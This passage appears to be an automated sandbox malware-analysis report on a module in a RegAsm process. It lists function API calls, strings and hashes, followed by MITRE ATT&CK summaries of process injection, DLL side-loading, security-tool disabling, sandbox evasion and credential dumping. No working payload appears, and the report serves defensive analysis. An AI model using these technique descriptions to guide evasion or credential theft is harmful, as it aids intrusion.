Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: strncmp
String ID: -$-$0$]$false$null$true$}
API String ID: 1114863663-1443276563
Opcode ID: 4366ec816b9fce7022b57502cc8f689d133e39cff5fe7996cab8ff7cfed47eb1
Instruction ID: 7d0d7d581299a88f4ecf4101ed3cb2921062378b47abb911dec42016596cbabc
Opcode Fuzzy Hash: 4366ec816b9fce7022b57502cc8f689d133e39cff5fe7996cab8ff7cfed47eb1
Instruction Fuzzy Hash: 4BD1DF70B482768ADB12CFA8C4443DABBF2AFCA318F69C25BD4919B281D739D446C751

Function 61E44905 Relevance: 13.8, APIs: 6, Strings: 3, Instructions: 346COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E44953
memcmp.MSVCRT ref: 61E44A05
memcmp.MSVCRT ref: 61E44BC9
memcmp.MSVCRT ref: 61E44C16
memcmp.MSVCRT ref: 61E44C7A
memcmp.MSVCRT ref: 61E44CAE

Strings

cache, xrefs: 61E44CA7, 61E44CC5
access, xrefs: 61E44BE0
@, xrefs: 61E44922

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: @$access$cache
API String ID: 1475443563-1361544076
Opcode ID: d5536d11e1446137f876ee1720edd4e4232c55533b5c63909df9ac41a168e106
Instruction ID: bf7f6bc55254c54d21197c9aa673ce015ae0bdc4e4658c964804263f7089fac0
Opcode Fuzzy Hash: d5536d11e1446137f876ee1720edd4e4232c55533b5c63909df9ac41a168e106
Instruction Fuzzy Hash: FDD16FB4A083558FEB11CFA4D48039EBBF1AF89318F28C45ED895AB341E339D841DB55

Function 61E241D7 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 180stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 61E24268

Strings

ya, xrefs: 61E2429A
ya, xrefs: 61E2427F
(blob), xrefs: 61E2439F
program, xrefs: 61E24457
Xya, xrefs: 61E24418
bua, xrefs: 61E24274
NULL, xrefs: 61E243A4
bua, xrefs: 61E24252

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: strcmp
String ID: ya$ya$(blob)$NULL$Xya$bua$bua$program
API String ID: 1004003707-2454903709
Opcode ID: a6b2441489b3eea19d207b247f0247f0001f19373451080d8235a064463bd687
Instruction ID: 4befd86826370bfd8630e1afa8d422750160e2b9b2ea18a9ced5634f5bcee847
Opcode Fuzzy Hash: a6b2441489b3eea19d207b247f0247f0001f19373451080d8235a064463bd687
Instruction Fuzzy Hash: 3B7115B49097469FC708CF58C191A59BBF0BF8A304F25C85EE8A89B751D335D882CF92

Function 61EAFA90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 61EAFABB
vfprintf.MSVCRT ref: 61EAFAD7
abort.MSVCRT ref: 61EAFADC
VirtualQuery.KERNEL32 ref: 61EAFB80
VirtualProtect.KERNEL32 ref: 61EAFBC2

Strings

@, xrefs: 61EAFBAB

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: Virtual$ProtectQueryabortfwritevfprintf
String ID: @
API String ID: 1503958624-2766056989
Opcode ID: c2659c9de0e6f83528643800fc17f210c5c049cf07d0f7c16b155af3332bfc43
Instruction ID: e02739713456e9e2b4b58c9f61bb7aa4e21306e92e7ace3c3799b12748f41957
Opcode Fuzzy Hash: c2659c9de0e6f83528643800fc17f210c5c049cf07d0f7c16b155af3332bfc43
Instruction Fuzzy Hash: 9A412AB1A547029FD700DF68D58464ABBF0FB89758F64C92DE8A98B340E734E884CB52

Function 61E01040 Relevance: 10.6, APIs: 7, Instructions: 132sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,61E012DC), ref: 61E01077
_amsg_exit.MSVCRT ref: 61E010A4

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: a124d45cb5394699c2ab659ebe120ec1ccf49b51c805edf607fecf4702c5277b
Instruction ID: a154691f748ef5392a7e4955094c5928503ae470ce452f5208c2c148eeae8840
Opcode Fuzzy Hash: a124d45cb5394699c2ab659ebe120ec1ccf49b51c805edf607fecf4702c5277b
Instruction Fuzzy Hash: 13414F71B146818FEB00AFE8C98470BB7F1EB85399F64C53DE4A48B344D775D9918B82

Function 61EAF850 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 61EAF889
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61EAF89A
GetCurrentThreadId.KERNEL32 ref: 61EAF8A2
GetTickCount.KERNEL32 ref: 61EAF8AA
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61EAF8B9

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 11ba3c5eec943ccd272f0a4fc468b32cfef13cd0c029082f67a55811cb38d485
Instruction ID: 8be46cd1f480235cb6d0906dde7f3b0c5fd652d59fe7cf958993e94cb5683476
Opcode Fuzzy Hash: 11ba3c5eec943ccd272f0a4fc468b32cfef13cd0c029082f67a55811cb38d485
Instruction Fuzzy Hash: 8D1170B29553118FCB00DFB9E58855BBBE0FB89654F050939E544CB200EB35D9898B92

Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 61E01456
GetProcAddress.KERNEL32 ref: 61E01471

Strings

libgcj-16.dll, xrefs: 61E0144F
_Jv_RegisterClasses, xrefs: 61E01466

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _Jv_RegisterClasses$libgcj-16.dll
API String ID: 1646373207-328863460
Opcode ID: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
Instruction ID: ecefe885db533eab1004145bf0edfd2de441c317d2227bbbfd891c436449bb9f
Opcode Fuzzy Hash: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
Instruction Fuzzy Hash: CBE06DB4914B029BEB017FF4850633EBAF5AFC570AF72C42CD4808A290EA30C4818763

Function 61E3720A Relevance: 6.4, APIs: 3, Strings: 1, Instructions: 359COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E373CE
memcmp.MSVCRT ref: 61E37560
memcmp.MSVCRT ref: 61E37690

Strings

0, xrefs: 61E3767C

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: 0
API String ID: 1475443563-4108050209
Opcode ID: 83c6ba0f8f63bb70d6e249cfeaf4de278211f53a98edee321264bd888aa8c0dc
Instruction ID: 3f20ce3ba2961136da7f3248cde08971803f4c449cb9daae0617fd169a942f67
Opcode Fuzzy Hash: 83c6ba0f8f63bb70d6e249cfeaf4de278211f53a98edee321264bd888aa8c0dc
Instruction Fuzzy Hash: 6CE112B0E04269CBDB41CFA8C99078DBBF1BF89318F258569D859AB345D734E886CF41

Function 61E40BB5 Relevance: 6.4, APIs: 5, Instructions: 106COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E40C37
memcmp.MSVCRT ref: 61E40C5C
memcmp.MSVCRT ref: 61E40C86
memcmp.MSVCRT ref: 61E40CB5
memcmp.MSVCRT ref: 61E40CE1

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 8cc521fb16cdd100886a572f5b312f8a70bae0a598922c27761b03018ed4fb84
Instruction ID: fd79a925e1d847c1357e69ee8e74f21d123acc92255d85b94bee504056160bb0
Opcode Fuzzy Hash: 8cc521fb16cdd100886a572f5b312f8a70bae0a598922c27761b03018ed4fb84
Instruction Fuzzy Hash: C0414EB0A083058BE7049FA9D68439EBAF5EFD5358F25C83DE898CB384D775D4458B42

Function 61E3D021 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 293stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 61E3D129

Strings

], xrefs: 61E3D302
-, xrefs: 61E3D2AF
#, xrefs: 61E3D24E

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: strncmp
String ID: #$-$]
API String ID: 1114863663-3149169660
Opcode ID: f99a3957d435e7ea3bb32a2a14cb1bf4f5c1a1f05ad08d6a5497aa7015d5eb71
Instruction ID: 1c490b0b60c0b5d90f91e160a7bf365b8f8ab346ded86ed4ccdc7e106188df17
Opcode Fuzzy Hash: f99a3957d435e7ea3bb32a2a14cb1bf4f5c1a1f05ad08d6a5497aa7015d5eb71
Instruction Fuzzy Hash: 82D15774D082698BDB01CF98C18479DFBF2BF89748FA9C059D854AB292D335E986CF50

Function 61EAF6D0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 61EAF6F5
__dllonexit.MSVCRT ref: 61EAF733
_unlock.MSVCRT ref: 61EAF763
_onexit.MSVCRT ref: 61EAF777

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: __dllonexit_lock_onexit_unlock
String ID:
API String ID: 209411981-0
Opcode ID: 14a068eb5279b83cbe249a705044353e42ef401f74677ddee49b1cb2808ff91a
Instruction ID: d8116788f2c50d2f41c70b1de34e9b41b7999a481f31fa547576aa82505b99b8
Opcode Fuzzy Hash: 14a068eb5279b83cbe249a705044353e42ef401f74677ddee49b1cb2808ff91a
Instruction Fuzzy Hash: 7D1155B5A197418FCB40EF74D48455EBBE0AB89254F618D2EE4E5CB350E738D5848B82

Function 61EAFAF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 61EAFB80
VirtualProtect.KERNEL32 ref: 61EAFBC2

Strings

@, xrefs: 61EAFBAB

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: @
API String ID: 1027372294-2766056989
Opcode ID: 291e62d0b65acdb3804ba4f4353593b383c4c3d38d689e226719f6992fe71c3d
Instruction ID: d36ff6d444c1f5105915669b8fb698cf4239ff4a3251c649fd02843d9bfa6c4b
Opcode Fuzzy Hash: 291e62d0b65acdb3804ba4f4353593b383c4c3d38d689e226719f6992fe71c3d
Instruction Fuzzy Hash: C0316DB2A447018FE710DF68D99464AFBF0FB44358F55C92DD8A98B340E734E844CB92

Function 61EAFEE0 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 61EAFEEE
TlsGetValue.KERNEL32 ref: 61EAFF15
GetLastError.KERNEL32 ref: 61EAFF1C
LeaveCriticalSection.KERNEL32 ref: 61EAFF3C

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: a187a0561b15ac659cc27c31303386dc53fb4f2523cc2de19bd987d58d59314a
Instruction ID: 3c942bbf6517c0ec0331f125ad054bd991ea38a51cb55fe1ac34f487ea1a944f
Opcode Fuzzy Hash: a187a0561b15ac659cc27c31303386dc53fb4f2523cc2de19bd987d58d59314a
Instruction Fuzzy Hash: C0F081B6A016008FDB00BFB9A98951A7BA8EB46A44B19416CD9548B309D730E885CBE3

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
